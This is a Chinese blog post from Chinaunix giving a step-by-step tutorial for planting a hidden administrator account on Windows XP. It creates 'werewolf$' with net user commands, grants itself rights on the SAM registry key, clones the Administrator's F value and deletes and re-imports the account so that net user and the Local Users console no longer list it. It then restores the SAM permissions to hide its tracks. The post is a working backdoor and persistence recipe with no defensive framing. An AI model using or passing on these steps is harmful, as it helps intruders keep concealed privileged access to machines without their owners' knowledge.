Chinaunix首页 | 论坛 | 博客
  • 博客访问: 169991
  • 博文数量: 200
  • 博客积分: 10
  • 博客等级: 民兵
  • 技术积分: 1285
  • 用 户 组: 普通用户
  • 注册时间: 2012-07-03 19:45
文章分类

全部博文(200)

文章存档

2012年(200)

我的朋友

分类:

2012-07-04 13:11:26

推荐度:★★★
关于这个题目网上有很多,可能多数说的很笼统。我结合自己的实践+理论具体地讲一下。
建立隐藏超级帐户,关键在于隐藏。因为我们要建立的这个超级帐户信息是确实存在于WindowsXP的安全账号管理器SAM(Security Account Manager)的数据库文件里。当然,微软对这个文件做了许多加密措施,并且赋予了他系统最高权限帐户SYSTEM的权限,所以我们注意到注册表项\HKEY_LOCAL_MACHINE\SAM\SAM的值空空如也,其目的很单纯:禁止包括Administrator等一切普通用户在用户态访问SAM。今天就让我们来打破这个神话!

利用注册表添加WindowsXP系统的超级隐藏帐户只需要如下三步:
S1:运行CMD,建立管理员帐户
#net user werewolf$ andylau336 /add
命令成功完成。
#net localgroup Administrators werewolf$ /add
命令成功完成。
;第一个命令:添加用户werewolf$,设置密码为andylau。
;第二个命令:将刚新建的werewolf$用户加入本地Administrators组。
C:\>net user werewolf$
用户名                 werewolf$
全名
注释
用户的注释
国家(地区)代码         000 (系统默认值)
帐户启用               Yes
帐户到期               从不

上次设置密码           2008/10/1 下午 01:24
密码到期               2008/11/13 下午 12:11
密码可更改             2008/10/1 下午 01:24
需要密码               Yes
用户可以更改密码        Yes

允许的工作站           All
登录脚本
用户配置文件
主目录
上次登录               从不

可允许的登录小时数      All

本地组成员             *Administrators       *Users
全局组成员             *None
命令成功完成。
我们看到本地组成员里有Administrators和Users,这说明werewolf$用户同时是这两个组的成员。原因是用#net user werewolf$ andylau336 /add这个命令系统默认将该用户划到Users组里了。

S2:给注册表的SAM文件提权,拷贝Administrator管理员用户信息
运行注册表编辑器进入\HKEY_LOCAL_MACHINE\SAM\SAM,右键SAM——>权限(P),注意到里面至少有两个用户Administrators、SYSTEM,因此我们有两个办法提权这个SAM文件!哪两个?汗~,当然一个从Administrator下手,另一个则从SYSTEM下手喽
   S2-1:Administrators
   这个简单,将下面的选项卡的“Administrators的权限(P)”里的“完全控制”和“读取”的勾打上,确定。
刷新下!看到了吗,SAM是不是有值了?
   S2-2:SYSTEM
   这个就不用说了,我前面的文章里提到的用SYSTEM帐户进入SAM的方法,没了解的请参见我的文章:
Windows系统的超级帐户SYSTEM
  好了,了解了怎么提权SAM,咱们继续……
  到\HKEY_LOCAL_MACHINE\SAM\SAM\Domains,进入Users,看到相类似于000001F4这样的项,这些就是系统用户的老家了。打开Names拓扑,我们查看Administrator用户的”类型“,我机器上Administrator用户的二进制值的”类型“是0x1f4,对照该类型号在Users里找到相应的用户编号,一般都是一一对应的。我这个就对应于000001F4,双击右侧窗口的”F“这个二进制值,然后将下面的”数据数值“内容复制下来。好的,按照上面的方法找到werewolf$用户的编号”F“值,双击,然后将改werewolf$用户的”数据数值“内容全部覆盖即可。然后分别将Names下的werewolf$项导出为1.reg,再将对应编号的项导出2.reg。

S3:隐藏
回到CMD,将刚建好的用户删除。
#net user werewolf$ /del
命令成功完成。
刷新一下,双击运行1.reg、2.reg。
查看注册表,我们发现werewolf$用户又重现了。但是小菜是绝对不会发现的:
1:查看”我的电脑“——>”管理“——>”本地用户和组“——>”用户“没有吧?
2:运行CMD,键入命令#net user,没有吧?
o(∩_∩)o...,所以说小菜级人物除非将注册表SAM给提权了才能查看是不是系统又隐藏帐户。

最后将清除脚印,将SAM项的权限完璧归赵。
 

阅读(180) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~